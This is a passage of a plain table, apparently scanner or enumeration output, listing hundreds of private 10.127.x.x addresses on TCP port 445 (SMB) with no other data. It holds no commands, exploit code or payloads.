| N/A | 10.127.0.99:445 | | tcp |
| N/A | 10.127.0.98:445 | | tcp |
| N/A | 10.127.0.118:445 | | tcp |
| N/A | 10.127.0.90:445 | | tcp |
| N/A | 10.127.0.94:445 | | tcp |
| N/A | 10.127.0.67:445 | | tcp |
| N/A | 10.127.0.86:445 | | tcp |
| N/A | 10.127.0.87:445 | | tcp |
| N/A | 10.127.0.93:445 | | tcp |
| N/A | 10.127.0.92:445 | | tcp |
| N/A | 10.127.0.106:445 | | tcp |
| N/A | 10.127.0.105:445 | | tcp |
| N/A | 10.127.0.77:445 | | tcp |
| N/A | 10.127.0.116:445 | | tcp |
| N/A | 10.127.0.100:445 | | tcp |
| N/A | 10.127.0.65:445 | | tcp |
| N/A | 10.127.0.84:445 | | tcp |
| N/A | 10.127.0.83:445 | | tcp |
| N/A | 10.127.0.117:445 | | tcp |
| N/A | 10.127.0.109:445 | | tcp |
| N/A | 10.127.0.71:445 | | tcp |
| N/A | 10.127.0.104:445 | | tcp |
| N/A | 10.127.0.69:445 | | tcp |
| N/A | 10.127.0.76:445 | | tcp |
| N/A | 10.127.0.66:445 | | tcp |
| N/A | 10.127.0.79:445 | | tcp |
| N/A | 10.127.0.128:445 | | tcp |
| N/A | 10.127.0.189:445 | | tcp |
| N/A | 10.127.0.147:445 | | tcp |
| N/A | 10.127.0.176:445 | | tcp |
| N/A | 10.127.0.152:445 | | tcp |
| N/A | 10.127.0.162:445 | | tcp |
| N/A | 10.127.0.140:445 | | tcp |
| N/A | 10.127.0.175:445 | | tcp |
| N/A | 10.127.0.135:445 | | tcp |
| N/A | 10.127.0.144:445 | | tcp |
| N/A | 10.127.0.168:445 | | tcp |
| N/A | 10.127.0.160:445 | | tcp |
| N/A | 10.127.0.163:445 | | tcp |
| N/A | 10.127.0.174:445 | | tcp |
| N/A | 10.127.0.178:445 | | tcp |
| N/A | 10.127.0.138:445 | | tcp |
| N/A | 10.127.0.180:445 | | tcp |
| N/A | 10.127.0.190:445 | | tcp |
| N/A | 10.127.0.172:445 | | tcp |
| N/A | 10.127.0.184:445 | | tcp |
| N/A | 10.127.0.185:445 | | tcp |
| N/A | 10.127.0.136:445 | | tcp |
| N/A | 10.127.0.142:445 | | tcp |
| N/A | 10.127.0.133:445 | | tcp |
| N/A | 10.127.0.166:445 | | tcp |
| N/A | 10.127.0.149:445 | | tcp |
| N/A | 10.127.0.167:445 | | tcp |
| N/A | 10.127.0.132:445 | | tcp |
| N/A | 10.127.0.146:445 | | tcp |
| N/A | 10.127.0.187:445 | | tcp |
| N/A | 10.127.0.159:445 | | tcp |
| N/A | 10.127.0.177:445 | | tcp |
| N/A | 10.127.0.155:445 | | tcp |
| N/A | 10.127.0.143:445 | | tcp |
| N/A | 10.127.0.164:445 | | tcp |
| N/A | 10.127.0.130:445 | | tcp |
| N/A | 10.127.0.158:445 | | tcp |
| N/A | 10.127.0.148:445 | | tcp |
| N/A | 10.127.0.153:445 | | tcp |
| N/A | 10.127.0.181:445 | | tcp |
| N/A | 10.127.0.137:445 | | tcp |
| N/A | 10.127.0.150:445 | | tcp |
| N/A | 10.127.0.145:445 | | tcp |
| N/A | 10.127.0.134:445 | | tcp |
| N/A | 10.127.0.141:445 | | tcp |
| N/A | 10.127.0.151:445 | | tcp |
| N/A | 10.127.0.157:445 | | tcp |
| N/A | 10.127.0.179:445 | | tcp |
| N/A | 10.127.0.139:445 | | tcp |
| N/A | 10.127.0.161:445 | | tcp |
| N/A | 10.127.0.186:445 | | tcp |
| N/A | 10.127.0.129:445 | | tcp |
| N/A | 10.127.0.182:445 | | tcp |
| N/A | 10.127.0.165:445 | | tcp |
| N/A | 10.127.0.169:445 | | tcp |
| N/A | 10.127.0.173:445 | | tcp |
| N/A | 10.127.0.188:445 | | tcp |
| N/A | 10.127.0.156:445 | | tcp |
| N/A | 10.127.0.183:445 | | tcp |
| N/A | 10.127.0.131:445 | | tcp |
| N/A | 10.127.0.154:445 | | tcp |
| N/A | 10.127.0.191:445 | | tcp |
| N/A | 10.127.0.170:445 | | tcp |
| N/A | 10.127.0.171:445 | | tcp |
| N/A | 10.127.0.215:445 | | tcp |
| N/A | 10.127.0.234:445 | | tcp |
| N/A | 10.127.0.224:445 | | tcp |
| N/A | 10.127.0.222:445 | | tcp |
| N/A | 10.127.0.209:445 | | tcp |
| N/A | 10.127.0.216:445 | | tcp |
| N/A | 10.127.0.219:445 | | tcp |
| N/A | 10.127.0.238:445 | | tcp |
| N/A | 10.127.0.248:445 | | tcp |
| N/A | 10.127.0.212:445 | | tcp |
| N/A | 10.127.0.206:445 | | tcp |
| N/A | 10.127.0.199:445 | | tcp |
| N/A | 10.127.0.226:445 | | tcp |
| N/A | 10.127.0.235:445 | | tcp |
| N/A | 10.127.0.220:445 | | tcp |
| N/A | 10.127.0.242:445 | | tcp |
| N/A | 10.127.0.246:445 | | tcp |
| N/A | 10.127.0.196:445 | | tcp |
| N/A | 10.127.0.201:445 | | tcp |
| N/A | 10.127.0.205:445 | | tcp |
| N/A | 10.127.0.211:445 | | tcp |
| N/A | 10.127.0.233:445 | | tcp |
| N/A | 10.127.0.237:445 | | tcp |
| N/A | 10.127.0.249:445 | | tcp |
| N/A | 10.127.0.232:445 | | tcp |
| N/A | 10.127.0.200:445 | | tcp |
| N/A | 10.127.0.251:445 | | tcp |
| N/A | 10.127.0.254:445 | | tcp |
| N/A | 10.127.0.195:445 | | tcp |
| N/A | 10.127.0.218:445 | | tcp |
| N/A | 10.127.0.245:445 | | tcp |
| N/A | 10.127.0.213:445 | | tcp |
| N/A | 10.127.0.225:445 | | tcp |
| N/A | 10.127.0.250:445 | | tcp |
| N/A | 10.127.0.192:445 | | tcp |
| N/A | 10.127.0.221:445 | | tcp |
| N/A | 10.127.1.0:445 | | tcp |
| N/A | 10.127.0.223:445 | | tcp |
| N/A | 10.127.0.210:445 | | tcp |
| N/A | 10.127.0.240:445 | | tcp |
| N/A | 10.127.0.244:445 | | tcp |
| N/A | 10.127.0.247:445 | | tcp |
| N/A | 10.127.0.217:445 | | tcp |
| N/A | 10.127.0.255:445 | | tcp |
| N/A | 10.127.0.230:445 | | tcp |
| N/A | 10.127.0.208:445 | | tcp |
| N/A | 10.127.0.253:445 | | tcp |
| N/A | 10.127.0.197:445 | | tcp |
| N/A | 10.127.0.236:445 | | tcp |
| N/A | 10.127.0.204:445 | | tcp |
| N/A | 10.127.0.227:445 | | tcp |
| N/A | 10.127.0.229:445 | | tcp |
| N/A | 10.127.0.252:445 | | tcp |
| N/A | 10.127.0.202:445 | | tcp |
| N/A | 10.127.0.214:445 | | tcp |
| N/A | 10.127.0.207:445 | | tcp |
| N/A | 10.127.0.231:445 | | tcp |
| N/A | 10.127.0.243:445 | | tcp |
| N/A | 10.127.0.241:445 | | tcp |
| N/A | 10.127.0.194:445 | | tcp |
| N/A | 10.127.0.193:445 | | tcp |
| N/A | 10.127.0.203:445 | | tcp |
| N/A | 10.127.0.228:445 | | tcp |
| N/A | 10.127.0.239:445 | | tcp |
| N/A | 10.127.1.14:445 | | tcp |
| N/A | 10.127.1.31:445 | | tcp |
| N/A | 10.127.1.52:445 | | tcp |
| N/A | 10.127.1.6:445 | | tcp |
| N/A | 10.127.1.21:445 | | tcp |
| N/A | 10.127.1.15:445 | | tcp |
| N/A | 10.127.1.37:445 | | tcp |
| N/A | 10.127.1.61:445 | | tcp |
| N/A | 10.127.1.44:445 | | tcp |
| N/A | 10.127.1.29:445 | | tcp |
| N/A | 10.127.1.23:445 | | tcp |
| N/A | 10.127.1.47:445 | | tcp |
| N/A | 10.127.1.7:445 | | tcp |
| N/A | 10.127.1.26:445 | | tcp |
| N/A | 10.127.1.18:445 | | tcp |
| N/A | 10.127.1.45:445 | | tcp |
| N/A | 10.127.1.5:445 | | tcp |
| N/A | 10.127.1.20:445 | | tcp |
| N/A | 10.127.1.43:445 | | tcp |
| N/A | 10.127.1.59:445 | | tcp |
| N/A | 10.127.1.32:445 | | tcp |
| N/A | 10.127.1.42:445 | | tcp |
| N/A | 10.127.1.60:445 | | tcp |
| N/A | 10.127.1.35:445 | | tcp |
| N/A | 10.127.1.58:445 | | tcp |
| N/A | 10.127.1.56:445 | | tcp |
| N/A | 10.127.1.46:445 | | tcp |
| N/A | 10.127.1.28:445 | | tcp |
| N/A | 10.127.1.1:445 | | tcp |
| N/A | 10.127.1.55:445 | | tcp |
| N/A | 10.127.1.9:445 | | tcp |
| N/A | 10.127.1.39:445 | | tcp |
| N/A | 10.127.1.63:445 | | tcp |
| N/A | 10.127.1.38:445 | | tcp |
| N/A | 10.127.1.53:445 | | tcp |
| N/A | 10.127.1.62:445 | | tcp |
| N/A | 10.127.1.40:445 | | tcp |
| N/A | 10.127.1.13:445 | | tcp |
| N/A | 10.127.1.19:445 | | tcp |
| N/A | 10.127.1.27:445 | | tcp |
| N/A | 10.127.1.22:445 | | tcp |
| N/A | 10.127.1.33:445 | | tcp |
| N/A | 10.127.1.12:445 | | tcp |
| N/A | 10.127.1.34:445 | | tcp |
| N/A | 10.127.1.8:445 | | tcp |
| N/A | 10.127.1.48:445 | | tcp |
| N/A | 10.127.1.4:445 | | tcp |
| N/A | 10.127.1.30:445 | | tcp |
| N/A | 10.127.1.3:445 | | tcp |
| N/A | 10.127.1.49:445 | | tcp |
| N/A | 10.127.1.50:445 | | tcp |
| N/A | 10.127.1.2:445 | | tcp |
| N/A | 10.127.1.51:445 | | tcp |
| N/A | 10.127.1.24:445 | | tcp |
| N/A | 10.127.1.57:445 | | tcp |
| N/A | 10.127.1.16:445 | | tcp |
| N/A | 10.127.1.64:445 | | tcp |
| N/A | 10.127.1.11:445 | | tcp |
| N/A | 10.127.1.25:445 | | tcp |
| N/A | 10.127.1.10:445 | | tcp |
| N/A | 10.127.1.17:445 | | tcp |
| N/A | 10.127.1.36:445 | | tcp |
| N/A | 10.127.1.41:445 | | tcp |
| N/A | 10.127.1.54:445 | | tcp |
| N/A | 10.127.1.87:445 | | tcp |
| N/A | 10.127.1.83:445 | | tcp |
| N/A | 10.127.1.113:445 | | tcp |
| N/A | 10.127.1.68:445 | | tcp |
| N/A | 10.127.1.85:445 | | tcp |
| N/A | 10.127.1.106:445 | | tcp |
| N/A | 10.127.1.100:445 | | tcp |
| N/A | 10.127.1.123:445 | | tcp |
| N/A | 10.127.1.116:445 | | tcp |
| N/A | 10.127.1.108:445 | | tcp |
| N/A | 10.127.1.77:445 | | tcp |
| N/A | 10.127.1.82:445 | | tcp |
| N/A | 10.127.1.102:445 | | tcp |
| N/A | 10.127.1.65:445 | | tcp |
| N/A | 10.127.1.76:445 | | tcp |
| N/A | 10.127.1.78:445 | | tcp |
| N/A | 10.127.1.89:445 | | tcp |
| N/A | 10.127.1.105:445 | | tcp |
| N/A | 10.127.1.122:445 | | tcp |
| N/A | 10.127.1.69:445 | | tcp |
| N/A | 10.127.1.91:445 | | tcp |
| N/A | 10.127.1.128:445 | | tcp |
| N/A | 10.127.1.90:445 | | tcp |
| N/A | 10.127.1.103:445 | | tcp |
| N/A | 10.127.1.112:445 | | tcp |
| N/A | 10.127.1.93:445 | | tcp |
| N/A | 10.127.1.109:445 | | tcp |
| N/A | 10.127.1.84:445 | | tcp |
| N/A | 10.127.1.101:445 | | tcp |
| N/A | 10.127.1.127:445 | | tcp |
| N/A | 10.127.1.97:445 | | tcp |
| N/A | 10.127.1.120:445 | | tcp |
| N/A | 10.127.1.104:445 | | tcp |
| N/A | 10.127.1.67:445 | | tcp |
| N/A | 10.127.1.70:445 | | tcp |
| N/A | 10.127.1.80:445 | | tcp |
| N/A | 10.127.1.114:445 | | tcp |
| N/A | 10.127.1.118:445 | | tcp |
| N/A | 10.127.1.74:445 | | tcp |
| N/A | 10.127.1.75:445 | | tcp |
| N/A | 10.127.1.95:445 | | tcp |
| N/A | 10.127.1.107:445 | | tcp |
| N/A | 10.127.1.88:445 | | tcp |
| N/A | 10.127.1.121:445 | | tcp |
| N/A | 10.127.1.79:445 | | tcp |
| N/A | 10.127.1.81:445 | | tcp |
| N/A | 10.127.1.115:445 | | tcp |
| N/A | 10.127.1.125:445 | | tcp |
| N/A | 10.127.1.126:445 | | tcp |
| N/A | 10.127.1.111:445 | | tcp |
| N/A | 10.127.1.94:445 | | tcp |
| N/A | 10.127.1.117:445 | | tcp |
| N/A | 10.127.1.96:445 | | tcp |
| N/A | 10.127.1.92:445 | | tcp |
| N/A | 10.127.1.66:445 | | tcp |
| N/A | 10.127.1.71:445 | | tcp |
| N/A | 10.127.1.110:445 | | tcp |
| N/A | 10.127.1.99:445 | | tcp |
| N/A | 10.127.1.124:445 | | tcp |
| N/A | 10.127.1.72:445 | | tcp |
| N/A | 10.127.1.98:445 | | tcp |
| N/A | 10.127.1.86:445 | | tcp |
| N/A | 10.127.1.119:445 | | tcp |
| N/A | 10.127.1.73:445 | | tcp |
| N/A | 10.127.1.160:445 | | tcp |
| N/A | 10.127.1.161:445 | | tcp |
| N/A | 10.127.1.183:445 | | tcp |
| N/A | 10.127.1.132:445 | | tcp |
| N/A | 10.127.1.144:445 | | tcp |
| N/A | 10.127.1.168:445 | | tcp |
| N/A | 10.127.1.159:445 | | tcp |
| N/A | 10.127.1.163:445 | | tcp |
| N/A | 10.127.1.129:445 | | tcp |
| N/A | 10.127.1.149:445 | | tcp |
| N/A | 10.127.1.164:445 | | tcp |
| N/A | 10.127.1.189:445 | | tcp |
| N/A | 10.127.1.179:445 | | tcp |
| N/A | 10.127.1.137:445 | | tcp |
| N/A | 10.127.1.130:445 | | tcp |
| N/A | 10.127.1.143:445 | | tcp |
| N/A | 10.127.1.187:445 | | tcp |
| N/A | 10.127.1.191:445 | | tcp |
| N/A | 10.127.1.186:445 | | tcp |
| N/A | 10.127.1.152:445 | | tcp |
| N/A | 10.127.1.156:445 | | tcp |
| N/A | 10.127.1.146:445 | | tcp |
| N/A | 10.127.1.182:445 | | tcp |
| N/A | 10.127.1.184:445 | | tcp |
| N/A | 10.127.1.185:445 | | tcp |
| N/A | 10.127.1.134:445 | | tcp |
| N/A | 10.127.1.147:445 | | tcp |
| N/A | 10.127.1.167:445 | | tcp |
| N/A | 10.127.1.175:445 | | tcp |
| N/A | 10.127.1.192:445 | | tcp |
| N/A | 10.127.1.136:445 | | tcp |
| N/A | 10.127.1.169:445 | | tcp |
| N/A | 10.127.1.188:445 | | tcp |
| N/A | 10.127.1.155:445 | | tcp |
| N/A | 10.127.1.166:445 | | tcp |
| N/A | 10.127.1.171:445 | | tcp |
| N/A | 10.127.1.131:445 | | tcp |
| N/A | 10.127.1.154:445 | | tcp |
| N/A | 10.127.1.172:445 | | tcp |
| N/A | 10.127.1.190:445 | | tcp |
| N/A | 10.127.1.170:445 | | tcp |
| N/A | 10.127.1.177:445 | | tcp |
| N/A | 10.127.1.173:445 | | tcp |
| N/A | 10.127.1.145:445 | | tcp |
| N/A | 10.127.1.158:445 | | tcp |
| N/A | 10.127.1.178:445 | | tcp |
| N/A | 10.127.1.135:445 | | tcp |
| N/A | 10.127.1.142:445 | | tcp |
| N/A | 10.127.1.162:445 | | tcp |
| N/A | 10.127.1.133:445 | | tcp |
| N/A | 10.127.1.148:445 | | tcp |
| N/A | 10.127.1.176:445 | | tcp |
| N/A | 10.127.1.150:445 | | tcp |
| N/A | 10.127.1.139:445 | | tcp |
| N/A | 10.127.1.165:445 | | tcp |
| N/A | 10.127.1.181:445 | | tcp |
| N/A | 10.127.1.151:445 | | tcp |
| N/A | 10.127.1.141:445 | | tcp |
| N/A | 10.127.1.153:445 | | tcp |
| N/A | 10.127.1.157:445 | | tcp |
| N/A | 10.127.1.180:445 | | tcp |
| N/A | 10.127.1.138:445 | | tcp |
| N/A | 10.127.1.174:445 | | tcp |
| N/A | 10.127.1.140:445 | | tcp |
| N/A | 10.127.1.211:445 | | tcp |
| N/A | 10.127.1.248:445 | | tcp |
| N/A | 10.127.1.252:445 | | tcp |
| N/A | 10.127.1.208:445 | | tcp |
| N/A | 10.127.1.241:445 | | tcp |
| N/A | 10.127.1.240:445 | | tcp |
| N/A | 10.127.1.230:445 | | tcp |
| N/A | 10.127.1.197:445 | | tcp |
| N/A | 10.127.1.216:445 | | tcp |
| N/A | 10.127.2.0:445 | | tcp |
| N/A | 10.127.1.196:445 | | tcp |
| N/A | 10.127.1.206:445 | | tcp |
| N/A | 10.127.1.246:445 | | tcp |
| N/A | 10.127.1.210:445 | | tcp |
| N/A | 10.127.1.199:445 | | tcp |
| N/A | 10.127.1.221:445 | | tcp |
| N/A | 10.127.1.235:445 | | tcp |
| N/A | 10.127.1.238:445 | | tcp |
| N/A | 10.127.1.236:445 | | tcp |
| N/A | 10.127.1.218:445 | | tcp |
| N/A | 10.127.1.198:445 | | tcp |
| N/A | 10.127.1.249:445 | | tcp |
| N/A | 10.127.1.245:445 | | tcp |
| N/A | 10.127.1.228:445 | | tcp |
| N/A | 10.127.1.239:445 | | tcp |
| N/A | 10.127.1.212:445 | | tcp |
| N/A | 10.127.1.226:445 | | tcp |
| N/A | 10.127.1.217:445 | | tcp |
| N/A | 10.127.1.219:445 | | tcp |
| N/A | 10.127.1.242:445 | | tcp |
| N/A | 10.127.1.201:445 | | tcp |
| N/A | 10.127.1.251:445 | | tcp |
| N/A | 10.127.1.214:445 | | tcp |
| N/A | 10.127.1.215:445 | | tcp |
| N/A | 10.127.1.229:445 | | tcp |
| N/A | 10.127.1.195:445 | | tcp |
| N/A | 10.127.1.243:445 | | tcp |
| N/A | 10.127.1.194:445 | | tcp |
| N/A | 10.127.1.224:445 | | tcp |
| N/A | 10.127.1.204:445 | | tcp |
| N/A | 10.127.1.213:445 | | tcp |
| N/A | 10.127.1.250:445 | | tcp |
| N/A | 10.127.1.203:445 | | tcp |
| N/A | 10.127.1.220:445 | | tcp |
| N/A | 10.127.1.253:445 | | tcp |
| N/A | 10.127.1.225:445 | | tcp |
| N/A | 10.127.1.234:445 | | tcp |
| N/A | 10.127.1.202:445 | | tcp |
| N/A | 10.127.1.209:445 | | tcp |
| N/A | 10.127.1.254:445 | | tcp |
| N/A | 10.127.1.255:445 | | tcp |
| N/A | 10.127.1.200:445 | | tcp |
| N/A | 10.127.1.244:445 | | tcp |
| N/A | 10.127.1.231:445 | | tcp |
| N/A | 10.127.1.233:445 | | tcp |
| N/A | 10.127.1.193:445 | | tcp |
| N/A | 10.127.1.223:445 | | tcp |
| N/A | 10.127.1.237:445 | | tcp |
| N/A | 10.127.1.227:445 | | tcp |
| N/A | 10.127.1.247:445 | | tcp |
| N/A | 10.127.1.222:445 | | tcp |
| N/A | 10.127.1.232:445 | | tcp |
| N/A | 10.127.1.207:445 | | tcp |
| N/A | 10.127.1.205:445 | | tcp |
| N/A | 10.127.2.25:445 | | tcp |
| N/A | 10.127.2.10:445 | | tcp |
| N/A | 10.127.2.51:445 | | tcp |
| N/A | 10.127.2.62:445 | | tcp |
| N/A | 10.127.2.46:445 | | tcp |
| N/A | 10.127.2.36:445 | | tcp |
| N/A | 10.127.2.38:445 | | tcp |
| N/A | 10.127.2.19:445 | | tcp |
| N/A | 10.127.2.20:445 | | tcp |
| N/A | 10.127.2.24:445 | | tcp |
| N/A | 10.127.2.30:445 | | tcp |
| N/A | 10.127.2.3:445 | | tcp |
| N/A | 10.127.2.43:445 | | tcp |
| N/A | 10.127.2.22:445 | | tcp |
| N/A | 10.127.2.40:445 | | tcp |
| N/A | 10.127.2.34:445 | | tcp |
| N/A | 10.127.2.27:445 | | tcp |
| N/A | 10.127.2.6:445 | | tcp |
| N/A | 10.127.2.48:445 | | tcp |
| N/A | 10.127.2.55:445 | | tcp |
| N/A | 10.127.2.26:445 | | tcp |
| N/A | 10.127.2.18:445 | | tcp |
| N/A | 10.127.2.41:445 | | tcp |
| N/A | 10.127.2.54:445 | | tcp |
| N/A | 10.127.2.2:445 | | tcp |
| N/A | 10.127.2.1:445 | | tcp |
| N/A | 10.127.2.21:445 | | tcp |
| N/A | 10.127.2.17:445 | | tcp |
| N/A | 10.127.2.15:445 | | tcp |
| N/A | 10.127.2.52:445 | | tcp |
| N/A | 10.127.2.13:445 | | tcp |
| N/A | 10.127.2.63:445 | | tcp |
| N/A | 10.127.2.59:445 | | tcp |
| N/A | 10.127.2.7:445 | | tcp |
| N/A | 10.127.2.50:445 | | tcp |
| N/A | 10.127.2.45:445 | | tcp |
| N/A | 10.127.2.5:445 | | tcp |
| N/A | 10.127.2.60:445 | | tcp |
| N/A | 10.127.2.28:445 | | tcp |
| N/A | 10.127.2.9:445 | | tcp |
| N/A | 10.127.2.61:445 | | tcp |
| N/A | 10.127.2.11:445 | | tcp |
| N/A | 10.127.2.53:445 | | tcp |
| N/A | 10.127.2.23:445 | | tcp |
| N/A | 10.127.2.32:445 | | tcp |
| N/A | 10.127.2.8:445 | | tcp |
| N/A | 10.127.2.42:445 | | tcp |
| N/A | 10.127.2.56:445 | | tcp |
| N/A | 10.127.2.58:445 | | tcp |
| N/A | 10.127.2.39:445 | | tcp |
| N/A | 10.127.2.64:445 | | tcp |
| N/A | 10.127.2.33:445 | | tcp |
| N/A | 10.127.2.4:445 | | tcp |
| N/A | 10.127.2.14:445 | | tcp |
| N/A | 10.127.2.35:445 | | tcp |
| N/A | 10.127.2.47:445 | | tcp |
| N/A | 10.127.2.49:445 | | tcp |
| N/A | 10.127.2.29:445 | | tcp |
| N/A | 10.127.2.16:445 | | tcp |
| N/A | 10.127.2.57:445 | | tcp |
| N/A | 10.127.2.12:445 | | tcp |
| N/A | 10.127.2.31:445 | | tcp |
| N/A | 10.127.2.37:445 | | tcp |
| N/A | 10.127.2.44:445 | | tcp |
| N/A | 10.127.2.71:445 | | tcp |
| N/A | 10.127.2.110:445 | | tcp |
| N/A | 10.127.2.103:445 | | tcp |
| N/A | 10.127.2.91:445 | | tcp |
| N/A | 10.127.2.125:445 | | tcp |
| N/A | 10.127.2.109:445 | | tcp |
| N/A | 10.127.2.68:445 | | tcp |
| N/A | 10.127.2.78:445 | | tcp |
| N/A | 10.127.2.122:445 | | tcp |
| N/A | 10.127.2.70:445 | | tcp |
| N/A | 10.127.2.118:445 | | tcp |
| N/A | 10.127.2.89:445 | | tcp |
| N/A | 10.127.2.119:445 | | tcp |
| N/A | 10.127.2.111:445 | | tcp |
| N/A | 10.127.2.113:445 | | tcp |
| N/A | 10.127.2.90:445 | | tcp |
| N/A | 10.127.2.76:445 | | tcp |
| N/A | 10.127.2.66:445 | | tcp |
| N/A | 10.127.2.115:445 | | tcp |
| N/A | 10.127.2.121:445 | | tcp |
| N/A | 10.127.2.120:445 | | tcp |
| N/A | 10.127.2.95:445 | | tcp |
| N/A | 10.127.2.106:445 | | tcp |
| N/A | 10.127.2.72:445 | | tcp |
| N/A | 10.127.2.80:445 | | tcp |
| N/A | 10.127.2.83:445 | | tcp |
| N/A | 10.127.2.65:445 | | tcp |
| N/A | 10.127.2.94:445 | | tcp |
| N/A | 10.127.2.92:445 | | tcp |
| N/A | 10.127.2.67:445 | | tcp |
| N/A | 10.127.2.82:445 | | tcp |
| N/A | 10.127.2.101:445 | | tcp |
| N/A | 10.127.2.77:445 | | tcp |
| N/A | 10.127.2.74:445 | | tcp |
| N/A | 10.127.2.102:445 | | tcp |
| N/A | 10.127.2.117:445 | | tcp |
| N/A | 10.127.2.124:445 | | tcp |
| N/A | 10.127.2.112:445 | | tcp |
| N/A | 10.127.2.73:445 | | tcp |
| N/A | 10.127.2.75:445 | | tcp |
| N/A | 10.127.2.100:445 | | tcp |
| N/A | 10.127.2.126:445 | | tcp |
| N/A | 10.127.2.93:445 | | tcp |
| N/A | 10.127.2.127:445 | | tcp |
| N/A | 10.127.2.81:445 | | tcp |
| N/A | 10.127.2.104:445 | | tcp |
| N/A | 10.127.2.99:445 | | tcp |
| N/A | 10.127.2.96:445 | | tcp |
| N/A | 10.127.2.105:445 | | tcp |
| N/A | 10.127.2.88:445 | | tcp |
| N/A | 10.127.2.85:445 | | tcp |
| N/A | 10.127.2.116:445 | | tcp |
| N/A | 10.127.2.128:445 | | tcp |
| N/A | 10.127.2.114:445 | | tcp |
| N/A | 10.127.2.69:445 | | tcp |
| N/A | 10.127.2.84:445 | | tcp |
| N/A | 10.127.2.86:445 | | tcp |
| N/A | 10.127.2.107:445 | | tcp |
| N/A | 10.127.2.87:445 | | tcp |
| N/A | 10.127.2.108:445 | | tcp |
| N/A | 10.127.2.79:445 | | tcp |
| N/A | 10.127.2.97:445 | tcp | |
| N/A | 10.127.2.98:445 | tcp | |
| N/A | 10.127.2.123:445 | tcp | |
| N/A | 10.127.2.135:445 | tcp | |
| N/A | 10.127.2.168:445 | tcp | |
| N/A | 10.127.2.130:445 | tcp | |
| N/A | 10.127.2.173:445 | tcp | |
| N/A | 10.127.2.180:445 | tcp | |
| N/A | 10.127.2.191:445 | tcp | |
| N/A | 10.127.2.149:445 | tcp | |
| N/A | 10.127.2.148:445 | tcp | |
| N/A | 10.127.2.175:445 | tcp | |
| N/A | 10.127.2.178:445 | tcp | |
| N/A | 10.127.2.137:445 | tcp | |
| N/A | 10.127.2.160:445 | tcp | |
| N/A | 10.127.2.185:445 | tcp | |
| N/A | 10.127.2.143:445 | tcp | |
| N/A | 10.127.2.145:445 | tcp | |
| N/A | 10.127.2.150:445 | tcp | |
| N/A | 10.127.2.176:445 | tcp | |
| N/A | 10.127.2.187:445 | tcp | |
| N/A | 10.127.2.188:445 | tcp | |
| N/A | 10.127.2.162:445 | tcp | |
| N/A | 10.127.2.172:445 | tcp | |
| N/A | 10.127.2.144:445 | tcp | |
| N/A | 10.127.2.167:445 | tcp | |
| N/A | 10.127.2.140:445 | tcp | |
| N/A | 10.127.2.152:445 | tcp | |
| N/A | 10.127.2.181:445 | tcp | |
| N/A | 10.127.2.170:445 | tcp | |
| N/A | 10.127.2.161:445 | tcp | |
| N/A | 10.127.2.132:445 | tcp | |
| N/A | 10.127.2.138:445 | tcp | |
| N/A | 10.127.2.142:445 | tcp | |
| N/A | 10.127.2.131:445 | tcp | |
| N/A | 10.127.2.141:445 | tcp | |
| N/A | 10.127.2.153:445 | tcp | |
| N/A | 10.127.2.184:445 | tcp | |
| N/A | 10.127.2.179:445 | tcp | |
| N/A | 10.127.2.136:445 | tcp | |
| N/A | 10.127.2.164:445 | tcp | |
| N/A | 10.127.2.165:445 | tcp | |
| N/A | 10.127.2.174:445 | tcp | |
| N/A | 10.127.2.186:445 | tcp | |
| N/A | 10.127.2.157:445 | tcp | |
| N/A | 10.127.2.158:445 | tcp | |
| N/A | 10.127.2.146:445 | tcp | |
| N/A | 10.127.2.159:445 | tcp | |
| N/A | 10.127.2.190:445 | tcp | |
| N/A | 10.127.2.134:445 | tcp | |
| N/A | 10.127.2.155:445 | tcp | |
| N/A | 10.127.2.171:445 | tcp | |
| N/A | 10.127.2.154:445 | tcp | |
| N/A | 10.127.2.151:445 | tcp | |
| N/A | 10.127.2.189:445 | tcp | |
| N/A | 10.127.2.133:445 | tcp | |
| N/A | 10.127.2.182:445 | tcp | |
| N/A | 10.127.2.163:445 | tcp | |
| N/A | 10.127.2.166:445 | tcp | |
| N/A | 10.127.2.139:445 | tcp | |
| N/A | 10.127.2.177:445 | tcp | |
| N/A | 10.127.2.169:445 | tcp | |
| N/A | 10.127.2.156:445 | tcp | |
| N/A | 10.127.2.183:445 | tcp | |
| N/A | 10.127.2.192:445 | tcp | |
| N/A | 10.127.2.129:445 | tcp | |
| N/A | 10.127.2.147:445 | tcp | |
| N/A | 10.127.2.194:445 | tcp | |
| N/A | 10.127.2.210:445 | tcp | |
| N/A | 10.127.2.243:445 | tcp | |
| N/A | 10.127.2.197:445 | tcp | |
| N/A | 10.127.2.219:445 | tcp | |
| N/A | 10.127.2.200:445 | tcp | |
| N/A | 10.127.2.222:445 | tcp | |
| N/A | 10.127.2.241:445 | tcp | |
| N/A | 10.127.2.255:445 | tcp | |
| N/A | 10.127.2.213:445 | tcp | |
| N/A | 10.127.2.214:445 | tcp | |
| N/A | 10.127.2.251:445 | tcp | |
| N/A | 10.127.2.220:445 | tcp | |
| N/A | 10.127.2.244:445 | tcp | |
| N/A | 10.127.2.203:445 | tcp | |
| N/A | 10.127.2.246:445 | tcp | |
| N/A | 10.127.2.217:445 | tcp | |
| N/A | 10.127.2.226:445 | tcp | |
| N/A | 10.127.2.234:445 | tcp | |
| N/A | 10.127.2.223:445 | tcp | |
| N/A | 10.127.3.0:445 | tcp | |
| N/A | 10.127.2.240:445 | tcp | |
| N/A | 10.127.2.215:445 | tcp | |
| N/A | 10.127.2.198:445 | tcp | |
| N/A | 10.127.2.224:445 | tcp | |
| N/A | 10.127.2.196:445 | tcp | |
| N/A | 10.127.2.199:445 | tcp | |
| N/A | 10.127.2.206:445 | tcp | |
| N/A | 10.127.2.229:445 | tcp | |
| N/A | 10.127.2.212:445 | tcp | |
| N/A | 10.127.2.201:445 | tcp | |
| N/A | 10.127.2.193:445 | tcp | |
| N/A | 10.127.2.202:445 | tcp | |
| N/A | 10.127.2.211:445 | tcp | |
| N/A | 10.127.2.242:445 | tcp | |
| N/A | 10.127.2.236:445 | tcp | |
| N/A | 10.127.2.247:445 | tcp | |
| N/A | 10.127.2.216:445 | tcp | |
| N/A | 10.127.2.228:445 | tcp | |
| N/A | 10.127.2.231:445 | tcp | |
| N/A | 10.127.2.254:445 | tcp | |
| N/A | 10.127.2.249:445 | tcp | |
| N/A | 10.127.2.218:445 | tcp | |
| N/A | 10.127.2.252:445 | tcp | |
| N/A | 10.127.2.195:445 | tcp | |
| N/A | 10.127.2.239:445 | tcp | |
| N/A | 10.127.2.248:445 | tcp | |
| N/A | 10.127.2.205:445 | tcp | |
| N/A | 10.127.2.208:445 | tcp | |
| N/A | 10.127.2.221:445 | tcp | |
